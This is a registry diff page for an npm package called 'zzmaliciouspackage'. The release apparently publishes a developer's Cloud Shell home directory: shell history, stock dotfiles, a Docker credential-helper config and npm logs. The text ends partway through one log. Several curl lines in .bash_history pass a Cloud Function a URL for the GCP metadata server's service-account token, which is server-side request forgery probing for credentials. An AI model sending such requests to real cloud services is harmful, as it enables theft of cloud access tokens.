zzmaliciouspackage 0.0.1-security → 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of zzmaliciouspackage might be problematic. Click here for more details.
- package/.bash_history +68 -0
- package/.bash_logout +7 -0
- package/.bashrc +118 -0
- package/.config/powershell/Microsoft.PowerShell_profile.ps1 +31 -0
- package/.docker/config.json +72 -0
- package/.npm/_cacache/content-v2/sha512/8a/7c/2cdaa2fa39b4041b58b901151a611adbc643b33fe4e5a8c0ed52a8445ced03599109426686664ffe2524f60f18d288743f62c859e49ec71ca09d509edffa +0 -0
- package/.npm/_cacache/index-v5/6d/a5/bc5f6365b8b3f98a49460f8eaf3b1695cad779d8186f6ba38bce1331ace6 +2 -0
- package/.npm/_logs/2024-12-29T13_28_32_046Z-debug-0.log +17 -0
- package/.npm/_logs/2025-01-07T09_56_41_159Z-debug-0.log +17 -0
- package/.npm/_logs/2025-01-07T11_06_09_776Z-debug-0.log +17 -0
- package/.npm/_logs/2025-01-07T11_13_34_128Z-debug-0.log +17 -0
- package/.npm/_logs/2025-01-08T14_46_43_919Z-debug-0.log +17 -0
- package/.npm/_logs/2025-01-13T11_45_21_671Z-debug-0.log +17 -0
- package/.npm/_logs/2025-02-11T13_10_32_216Z-debug-0.log +17 -0
- package/.npm/_logs/2025-02-11T13_16_40_877Z-debug-0.log +33 -0
- package/.npm/_logs/2025-02-11T13_24_31_398Z-debug-0.log +63 -0
- package/.npm/_logs/2025-02-11T13_25_04_599Z-debug-0.log +144 -0
- package/.npm/_logs/2025-02-11T13_34_14_153Z-debug-0.log +14 -0
- package/.npm/_update-notifier-last-checked +0 -0
- package/.profile +27 -0
- package/.rustup/settings.toml +4 -0
- package/.sudo_as_admin_successful +0 -0
- package/.viminfo +45 -0
- package/README-cloudshell.txt +16 -0
- package/package.json +11 -3
- package/README.md +0 -5
package/.bash_history
ADDED
@@ -0,0 +1,68 @@
|
|
1
|
+
pip install -r requirements.txt
|
2
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/function-1 -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -d '{ "name": "Hello World" }'
|
3
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/function-1 -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -d '{ "url": "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" }'
|
4
|
+
gcloud functions logs read function-1 --region=us-central1
|
5
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -d '{ "url": "https://jsonplaceholder.typicode.com/todos/1" }'
|
6
|
+
gcloud functions logs read zzigdon-imds-access-test-function --region=us-central1
|
7
|
+
curl -m 70 -X GET https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -d '{
|
8
|
+
"url": "https://jsonplaceholder.typicode.com/todos/1"
|
9
|
+
}'
|
10
|
+
curl -m 70 -X GET https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -d '{
|
11
|
+
"url": "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
|
12
|
+
}'
|
13
|
+
gcloud functions logs read zzigdon-imds-access-test-function --region=us-central1
|
14
|
+
curl -m 70 -X GET https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -d '{
|
15
|
+
"url": "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
|
16
|
+
}'
|
17
|
+
gcloud functions logs read zzigdon-imds-access-test-function --region=us-central1
|
18
|
+
curl -m 70 -X GET https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -d '{
|
19
|
+
"url": "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
|
20
|
+
}' --http1.1
|
21
|
+
curl -m 70 -X GET https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -d '{
|
22
|
+
"url": "https://jsonplaceholder.typicode.com/todos/1"
|
23
|
+
}' --http1.1
|
24
|
+
gcloud functions logs read zzigdon-imds-access-test-function --region=us-central1
|
25
|
+
curl -m 70 -X GET https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" --http1.1
|
26
|
+
curl -m 70 -X GET https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json"
|
27
|
+
gcloud functions logs read zzigdon-imds-access-test-function --region=us-central1
|
28
|
+
curl -m 70 -X GET https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json"
|
29
|
+
curl -m 70 -X GET https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -d '{
|
30
|
+
"url": "https://jsonplaceholder.typicode.com/todos/1"
|
31
|
+
}' --http1.1
|
32
|
+
curl -m 70 -X GET https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -d '{
|
33
|
+
"url": "https://jsonplaceholder.typicode.com/todos/1"
|
34
|
+
}'
|
35
|
+
curl -m 70 -X GET https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -d '{
|
36
|
+
"url": "https://jsonplaceholder.typicode.com/todos/1"
|
37
|
+
}' --http1.1
|
38
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -d '{ "url": "https://jsonplaceholder.typicode.com/todos/1" }' --http1.1
|
39
|
+
curl -X POST https://<YOUR_FUNCTION_URL> -H "url: http://example.com/some-path" -H "Authorization: bearer $(gcloud auth print-identity-token)"
|
40
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "url: http://example.com/some-path" --http1.1
|
41
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -H "url: https://jsonplaceholder.typicode.com/todos/1" --http1.1
|
42
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -H "Content-Length: 58" -d '{ "url": "https://jsonplaceholder.typicode.com/todos/1" }' --http1.1
|
43
|
+
gcloud functions logs read zzigdon-imds-access-test-function
|
44
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -H "Content-Length: 58" -d '{ "url": "https://jsonplaceholder.typicode.com/todos/1" }' --http1.1
|
45
|
+
gcloud functions logs read zzigdon-imds-access-test-function
|
46
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -H "Content-Length: 58" -d '{ "url": "https://jsonplaceholder.typicode.com/todos/1" }' --http1.1
|
47
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -d '{ "name": "Hello World" }'
|
48
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -H "Content-Length: 58" -d '{ "url": "https://jsonplaceholder.typicode.com/todos/1" }' --http1.1
|
49
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "url: path" --http1.1
|
50
|
+
curl -m 120 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -H "Content-Length: 58" -d '{ "url": "https://jsonplaceholder.typicode.com/todos/1" }' --http1.1
|
51
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -H "Content-Length: 58" -d '{ "url": "https://jsonplaceholder.typicode.com/todos/1" }' --http1.1
|
52
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "url: path" --http1.1
|
53
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -H "Content-Length: 58" -d '{ "url": "https://jsonplaceholder.typicode.com/todos/1" }' --http1.1
|
54
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -d '{ "name": "Hello World" }'
|
55
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json"
|
56
|
+
cle
|
57
|
+
clr
|
58
|
+
clear
|
59
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json"
|
60
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/function-1 -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json" -d '{
|
61
|
+
"name": "Hello World"
|
62
|
+
}'
|
63
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/function-1 -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json"
|
64
|
+
curl -m 70 -X POST https://us-central1-xdr-analytics.cloudfunctions.net/zzigdon-imds-access-test-function -H "Authorization: bearer $(gcloud auth print-identity-token)" -H "Content-Type: application/json"
|
65
|
+
npm init
|
66
|
+
vim /home/zzigdon/package.json
|
67
|
+
npm publish --scope public
|
68
|
+
npm adduser
|
package/.bash_logout
ADDED
package/.bashrc
ADDED
@@ -0,0 +1,118 @@
|
|
1
|
+
# ~/.bashrc: executed by bash(1) for non-login shells.
|
2
|
+
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
|
3
|
+
# for examples
|
4
|
+
|
5
|
+
# If not running interactively, don't do anything
|
6
|
+
case $- in
|
7
|
+
*i*) ;;
|
8
|
+
*) return;;
|
9
|
+
esac
|
10
|
+
|
11
|
+
# don't put duplicate lines or lines starting with space in the history.
|
12
|
+
# See bash(1) for more options
|
13
|
+
HISTCONTROL=ignoreboth
|
14
|
+
|
15
|
+
# append to the history file, don't overwrite it
|
16
|
+
shopt -s histappend
|
17
|
+
|
18
|
+
# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
|
19
|
+
HISTSIZE=1000
|
20
|
+
HISTFILESIZE=2000
|
21
|
+
|
22
|
+
# check the window size after each command and, if necessary,
|
23
|
+
# update the values of LINES and COLUMNS.
|
24
|
+
shopt -s checkwinsize
|
25
|
+
|
26
|
+
# If set, the pattern "**" used in a pathname expansion context will
|
27
|
+
# match all files and zero or more directories and subdirectories.
|
28
|
+
#shopt -s globstar
|
29
|
+
|
30
|
+
# make less more friendly for non-text input files, see lesspipe(1)
|
31
|
+
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"
|
32
|
+
|
33
|
+
# set variable identifying the chroot you work in (used in the prompt below)
|
34
|
+
if [ -z "${debian_chroot:-}" ] && [ -r /etc/debian_chroot ]; then
|
35
|
+
debian_chroot=$(cat /etc/debian_chroot)
|
36
|
+
fi
|
37
|
+
|
38
|
+
# set a fancy prompt (non-color, unless we know we "want" color)
|
39
|
+
case "$TERM" in
|
40
|
+
xterm-color|*-256color) color_prompt=yes;;
|
41
|
+
esac
|
42
|
+
|
43
|
+
# uncomment for a colored prompt, if the terminal has the capability; turned
|
44
|
+
# off by default to not distract the user: the focus in a terminal window
|
45
|
+
# should be on the output of commands, not on the prompt
|
46
|
+
#force_color_prompt=yes
|
47
|
+
|
48
|
+
if [ -n "$force_color_prompt" ]; then
|
49
|
+
if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
|
50
|
+
# We have color support; assume it's compliant with Ecma-48
|
51
|
+
# (ISO/IEC-6429). (Lack of such support is extremely rare, and such
|
52
|
+
# a case would tend to support setf rather than setaf.)
|
53
|
+
color_prompt=yes
|
54
|
+
else
|
55
|
+
color_prompt=
|
56
|
+
fi
|
57
|
+
fi
|
58
|
+
|
59
|
+
if [ "$color_prompt" = yes ]; then
|
60
|
+
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
|
61
|
+
else
|
62
|
+
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
|
63
|
+
fi
|
64
|
+
unset color_prompt force_color_prompt
|
65
|
+
|
66
|
+
# If this is an xterm set the title to user@host:dir
|
67
|
+
case "$TERM" in
|
68
|
+
xterm*|rxvt*)
|
69
|
+
PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
|
70
|
+
;;
|
71
|
+
*)
|
72
|
+
;;
|
73
|
+
esac
|
74
|
+
|
75
|
+
# enable color support of ls and also add handy aliases
|
76
|
+
if [ -x /usr/bin/dircolors ]; then
|
77
|
+
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
|
78
|
+
alias ls='ls --color=auto'
|
79
|
+
#alias dir='dir --color=auto'
|
80
|
+
#alias vdir='vdir --color=auto'
|
81
|
+
|
82
|
+
alias grep='grep --color=auto'
|
83
|
+
alias fgrep='fgrep --color=auto'
|
84
|
+
alias egrep='egrep --color=auto'
|
85
|
+
fi
|
86
|
+
|
87
|
+
# colored GCC warnings and errors
|
88
|
+
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'
|
89
|
+
|
90
|
+
# some more ls aliases
|
91
|
+
alias ll='ls -alF'
|
92
|
+
alias la='ls -A'
|
93
|
+
alias l='ls -CF'
|
94
|
+
|
95
|
+
# Add an "alert" alias for long running commands. Use like so:
|
96
|
+
# sleep 10; alert
|
97
|
+
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'
|
98
|
+
|
99
|
+
# Alias definitions.
|
100
|
+
# You may want to put all your additions into a separate file like
|
101
|
+
# ~/.bash_aliases, instead of adding them here directly.
|
102
|
+
# See /usr/share/doc/bash-doc/examples in the bash-doc package.
|
103
|
+
|
104
|
+
if [ -f ~/.bash_aliases ]; then
|
105
|
+
. ~/.bash_aliases
|
106
|
+
fi
|
107
|
+
|
108
|
+
# enable programmable completion features (you don't need to enable
|
109
|
+
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
|
110
|
+
# sources /etc/bash.bashrc).
|
111
|
+
if ! shopt -oq posix; then
|
112
|
+
if [ -f /usr/share/bash-completion/bash_completion ]; then
|
113
|
+
. /usr/share/bash-completion/bash_completion
|
114
|
+
elif [ -f /etc/bash_completion ]; then
|
115
|
+
. /etc/bash_completion
|
116
|
+
fi
|
117
|
+
fi
|
118
|
+
source /google/devshell/bashrc.google
|
@@ -0,0 +1,31 @@
|
|
1
|
+
#
|
2
|
+
# Copyright 2020 Google Inc. All Rights Reserved.
|
3
|
+
#
|
4
|
+
# Licensed under the Apache License, Version 2.0 (the "License");
|
5
|
+
# you may not use this file except in compliance with the License.
|
6
|
+
# You may obtain a copy of the License at
|
7
|
+
#
|
8
|
+
# http://www.apache.org/licenses/LICENSE-2.0
|
9
|
+
#
|
10
|
+
# Unless required by applicable law or agreed to in writing, software
|
11
|
+
# distributed under the License is distributed on an "AS IS" BASIS,
|
12
|
+
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
13
|
+
# See the License for the specific language governing permissions and
|
14
|
+
# limitations under the License.
|
15
|
+
#
|
16
|
+
# Startup profile that configures the PowerShell environment.
|
17
|
+
|
18
|
+
function prompt {
|
19
|
+
# If the gcloud sentinal file exists, that means a configuration changed.
|
20
|
+
# The file will not exists until `gcloud config set` is called.
|
21
|
+
if (Test-Path $env:CLOUDSDK_CONFIG/config_sentinel) {
|
22
|
+
$ACTIVE_CONFIG = Get-Content $env:CLOUDSDK_CONFIG/active_config
|
23
|
+
Get-Content "$env:CLOUDSDK_CONFIG/configurations/config_$ACTIVE_CONFIG" | foreach-object -begin {$h=@{}} -process { $k = [regex]::split($_,'='); if(($k[0].CompareTo("") -ne 0) -and ($k[0].StartsWith("[") -ne $True)) { $h.Add($k[0].trim(), $k[1].trim()) } }
|
24
|
+
$env:DEVSHELL_PROJECT_ID=$h.Get_Item("project")
|
25
|
+
$env:GOOGLE_CLOUD_PROJECT=$h.Get_Item("project")
|
26
|
+
$env:GOOGLE_CLOUD_QUOTA_PROJECT=$h.Get_Item("project")
|
27
|
+
|
28
|
+
# rm so we will not read the config each time.
|
29
|
+
rm -f $CLOUDSDK_CONFIG/config_sentinel
|
30
|
+
}
|
31
|
+
}
|
@@ -0,0 +1,72 @@
|
|
1
|
+
{
|
2
|
+
"credHelpers": {
|
3
|
+
"gcr.io": "gcloud",
|
4
|
+
"us.gcr.io": "gcloud",
|
5
|
+
"eu.gcr.io": "gcloud",
|
6
|
+
"asia.gcr.io": "gcloud",
|
7
|
+
"staging-k8s.gcr.io": "gcloud",
|
8
|
+
"marketplace.gcr.io": "gcloud",
|
9
|
+
"africa-south1-docker.pkg.dev": "gcloud",
|
10
|
+
"asia-docker.pkg.dev": "gcloud",
|
11
|
+
"asia-east1-docker.pkg.dev": "gcloud",
|
12
|
+
"asia-east2-docker.pkg.dev": "gcloud",
|
13
|
+
"asia-northeast1-docker.pkg.dev": "gcloud",
|
14
|
+
"asia-northeast2-docker.pkg.dev": "gcloud",
|
15
|
+
"asia-northeast3-docker.pkg.dev": "gcloud",
|
16
|
+
"asia-south1-docker.pkg.dev": "gcloud",
|
17
|
+
"asia-south2-docker.pkg.dev": "gcloud",
|
18
|
+
"asia-southeast1-docker.pkg.dev": "gcloud",
|
19
|
+
"asia-southeast2-docker.pkg.dev": "gcloud",
|
20
|
+
"australia-southeast1-docker.pkg.dev": "gcloud",
|
21
|
+
"australia-southeast2-docker.pkg.dev": "gcloud",
|
22
|
+
"docker.europe-west3.rep.pkg.dev": "gcloud",
|
23
|
+
"docker.europe-west8.rep.pkg.dev": "gcloud",
|
24
|
+
"docker.europe-west9.rep.pkg.dev": "gcloud",
|
25
|
+
"docker.me-central2.rep.pkg.dev": "gcloud",
|
26
|
+
"docker.us-central1.rep.pkg.dev": "gcloud",
|
27
|
+
"docker.us-central2.rep.pkg.dev": "gcloud",
|
28
|
+
"docker.us-east1.rep.pkg.dev": "gcloud",
|
29
|
+
"docker.us-east4.rep.pkg.dev": "gcloud",
|
30
|
+
"docker.us-east5.rep.pkg.dev": "gcloud",
|
31
|
+
"docker.us-east7.rep.pkg.dev": "gcloud",
|
32
|
+
"docker.us-south1.rep.pkg.dev": "gcloud",
|
33
|
+
"docker.us-west1.rep.pkg.dev": "gcloud",
|
34
|
+
"docker.us-west2.rep.pkg.dev": "gcloud",
|
35
|
+
"docker.us-west3.rep.pkg.dev": "gcloud",
|
36
|
+
"docker.us-west4.rep.pkg.dev": "gcloud",
|
37
|
+
"europe-central2-docker.pkg.dev": "gcloud",
|
38
|
+
"europe-docker.pkg.dev": "gcloud",
|
39
|
+
"europe-north1-docker.pkg.dev": "gcloud",
|
40
|
+
"europe-southwest1-docker.pkg.dev": "gcloud",
|
41
|
+
"europe-west1-docker.pkg.dev": "gcloud",
|
42
|
+
"europe-west2-docker.pkg.dev": "gcloud",
|
43
|
+
"europe-west3-docker.pkg.dev": "gcloud",
|
44
|
+
"europe-west4-docker.pkg.dev": "gcloud",
|
45
|
+
"europe-west6-docker.pkg.dev": "gcloud",
|
46
|
+
"europe-west8-docker.pkg.dev": "gcloud",
|
47
|
+
"europe-west9-docker.pkg.dev": "gcloud",
|
48
|
+
"europe-west10-docker.pkg.dev": "gcloud",
|
49
|
+
"europe-west12-docker.pkg.dev": "gcloud",
|
50
|
+
"me-central1-docker.pkg.dev": "gcloud",
|
51
|
+
"me-central2-docker.pkg.dev": "gcloud",
|
52
|
+
"me-west1-docker.pkg.dev": "gcloud",
|
53
|
+
"northamerica-northeast1-docker.pkg.dev": "gcloud",
|
54
|
+
"northamerica-northeast2-docker.pkg.dev": "gcloud",
|
55
|
+
"northamerica-south1-docker.pkg.dev": "gcloud",
|
56
|
+
"southamerica-east1-docker.pkg.dev": "gcloud",
|
57
|
+
"southamerica-west1-docker.pkg.dev": "gcloud",
|
58
|
+
"us-central1-docker.pkg.dev": "gcloud",
|
59
|
+
"us-central2-docker.pkg.dev": "gcloud",
|
60
|
+
"us-docker.pkg.dev": "gcloud",
|
61
|
+
"us-east1-docker.pkg.dev": "gcloud",
|
62
|
+
"us-east4-docker.pkg.dev": "gcloud",
|
63
|
+
"us-east5-docker.pkg.dev": "gcloud",
|
64
|
+
"us-east7-docker.pkg.dev": "gcloud",
|
65
|
+
"us-south1-docker.pkg.dev": "gcloud",
|
66
|
+
"us-west1-docker.pkg.dev": "gcloud",
|
67
|
+
"us-west2-docker.pkg.dev": "gcloud",
|
68
|
+
"us-west3-docker.pkg.dev": "gcloud",
|
69
|
+
"us-west4-docker.pkg.dev": "gcloud",
|
70
|
+
"us-west8-docker.pkg.dev": "gcloud"
|
71
|
+
}
|
72
|
+
}
|
@@ -0,0 +1,17 @@
|
|
1
|
+
0 verbose cli /usr/local/nvm/versions/node/v22.12.0/bin/node /usr/local/nvm/versions/node/v22.12.0/bin/npm
|
2
|
+
1 info using npm@11.0.0
|
3
|
+
2 info using node@v22.12.0
|
4
|
+
3 silly config load:file:/usr/local/nvm/versions/node/v22.12.0/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/home/zzigdon/.npmrc
|
6
|
+
5 silly config load:file:/usr/local/nvm/versions/node/v22.12.0/etc/npmrc
|
7
|
+
6 verbose title npm config get prefix
|
8
|
+
7 verbose argv "config" "--loglevel" "warn" "get" "prefix"
|
9
|
+
8 verbose logfile logs-max:10 dir:/home/zzigdon/.npm/_logs/2024-12-29T13_28_32_046Z-
|
10
|
+
9 verbose logfile /home/zzigdon/.npm/_logs/2024-12-29T13_28_32_046Z-debug-0.log
|
11
|
+
10 silly logfile done cleaning log files
|
12
|
+
11 verbose cwd /home/zzigdon
|
13
|
+
12 verbose os Linux 6.1.112+
|
14
|
+
13 verbose node v22.12.0
|
15
|
+
14 verbose npm v11.0.0
|
16
|
+
15 verbose exit 0
|
17
|
+
16 info ok
|
@@ -0,0 +1,17 @@
|
|
1
|
+
0 verbose cli /usr/local/nvm/versions/node/v22.12.0/bin/node /usr/local/nvm/versions/node/v22.12.0/bin/npm
|
2
|
+
1 info using npm@11.0.0
|
3
|
+
2 info using node@v22.12.0
|
4
|
+
3 silly config load:file:/usr/local/nvm/versions/node/v22.12.0/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/home/zzigdon/.npmrc
|
6
|
+
5 silly config load:file:/usr/local/nvm/versions/node/v22.12.0/etc/npmrc
|
7
|
+
6 verbose title npm config get prefix
|
8
|
+
7 verbose argv "config" "--loglevel" "warn" "get" "prefix"
|
9
|
+
8 verbose logfile logs-max:10 dir:/home/zzigdon/.npm/_logs/2025-01-07T09_56_41_159Z-
|
10
|
+
9 verbose logfile /home/zzigdon/.npm/_logs/2025-01-07T09_56_41_159Z-debug-0.log
|
11
|
+
10 silly logfile done cleaning log files
|
12
|
+
11 verbose cwd /home/zzigdon
|
13
|
+
12 verbose os Linux 6.1.112+
|
14
|
+
13 verbose node v22.12.0
|
15
|
+
14 verbose npm v11.0.0
|
16
|
+
15 verbose exit 0
|
17
|
+
16 info ok
|
@@ -0,0 +1,17 @@
|
|
1
|
+
0 verbose cli /usr/local/nvm/versions/node/v22.12.0/bin/node /usr/local/nvm/versions/node/v22.12.0/bin/npm
|
2
|
+
1 info using npm@11.0.0
|
3
|
+
2 info using node@v22.12.0
|
4
|
+
3 silly config load:file:/usr/local/nvm/versions/node/v22.12.0/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/home/zzigdon/.npmrc
|
6
|
+
5 silly config load:file:/usr/local/nvm/versions/node/v22.12.0/etc/npmrc
|
7
|
+
6 verbose title npm config get prefix
|
8
|
+
7 verbose argv "config" "--loglevel" "warn" "get" "prefix"
|
9
|
+
8 verbose logfile logs-max:10 dir:/home/zzigdon/.npm/_logs/2025-01-07T11_06_09_776Z-
|
10
|
+
9 verbose logfile /home/zzigdon/.npm/_logs/2025-01-07T11_06_09_776Z-debug-0.log
|
11
|
+
10 silly logfile done cleaning log files
|
12
|
+
11 verbose cwd /home/zzigdon
|
13
|
+
12 verbose os Linux 6.1.112+
|
14
|
+
13 verbose node v22.12.0
|
15
|
+
14 verbose npm v11.0.0
|
16
|
+
15 verbose exit 0
|
17
|
+
16 info ok
|
@@ -0,0 +1,17 @@
|
|
1
|
+
0 verbose cli /usr/local/nvm/versions/node/v22.12.0/bin/node /usr/local/nvm/versions/node/v22.12.0/bin/npm
|
2
|
+
1 info using npm@11.0.0
|
3
|
+
2 info using node@v22.12.0
|
4
|
+
3 silly config load:file:/usr/local/nvm/versions/node/v22.12.0/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/home/zzigdon/.npmrc
|
6
|
+
5 silly config load:file:/usr/local/nvm/versions/node/v22.12.0/etc/npmrc
|
7
|
+
6 verbose title npm config get prefix
|
8
|
+
7 verbose argv "config" "--loglevel" "warn" "get" "prefix"
|
9
|
+
8 verbose logfile logs-max:10 dir:/home/zzigdon/.npm/_logs/2025-01-07T11_13_34_128Z-
|
10
|
+
9 verbose logfile /home/zzigdon/.npm/_logs/2025-01-07T11_13_34_128Z-debug-0.log
|
11
|
+
10 silly logfile done cleaning log files
|
12
|
+
11 verbose cwd /home/zzigdon
|
13
|
+
12 verbose os Linux 6.1.112+
|
14
|
+
13 verbose node v22.12.0
|
15
|
+
14 verbose npm v11.0.0
|
16
|
+
15 verbose exit 0
|
17
|
+
16 info ok
|
@@ -0,0 +1,17 @@
|
|
1
|
+
0 verbose cli /usr/local/nvm/versions/node/v22.12.0/bin/node /usr/local/nvm/versions/node/v22.12.0/bin/npm
|
2
|
+
1 info using npm@11.0.0
|
3
|
+
2 info using node@v22.12.0
|
4
|
+
3 silly config load:file:/usr/local/nvm/versions/node/v22.12.0/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/home/zzigdon/.npmrc
|
6
|
+
5 silly config load:file:/usr/local/nvm/versions/node/v22.12.0/etc/npmrc
|
7
|
+
6 verbose title npm config get prefix
|
8
|
+
7 verbose argv "config" "--loglevel" "warn" "get" "prefix"
|
9
|
+
8 verbose logfile logs-max:10 dir:/home/zzigdon/.npm/_logs/2025-01-08T14_46_43_919Z-
|
10
|
+
9 verbose logfile /home/zzigdon/.npm/_logs/2025-01-08T14_46_43_919Z-debug-0.log
|
11
|
+
10 silly logfile done cleaning log files
|
12
|
+
11 verbose cwd /home/zzigdon
|
13
|
+
12 verbose os Linux 6.1.112+
|
14
|
+
13 verbose node v22.12.0
|
15
|
+
14 verbose npm v11.0.0
|
16
|
+
15 verbose exit 0
|
17
|
+
16 info ok
|
@@ -0,0 +1,17 @@
|
|
1
|
+
0 verbose cli /usr/local/nvm/versions/node/v22.12.0/bin/node /usr/local/nvm/versions/node/v22.12.0/bin/npm
|
2
|
+
1 info using npm@11.0.0
|
3
|
+
2 info using node@v22.12.0
|
4
|
+
3 silly config load:file:/usr/local/nvm/versions/node/v22.12.0/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/home/zzigdon/.npmrc
|
6
|
+
5 silly config load:file:/usr/local/nvm/versions/node/v22.12.0/etc/npmrc
|
7
|
+
6 verbose title npm config get prefix
|
8
|
+
7 verbose argv "config" "--loglevel" "warn" "get" "prefix"
|
9
|
+
8 verbose logfile logs-max:10 dir:/home/zzigdon/.npm/_logs/2025-01-13T11_45_21_671Z-
|
10
|
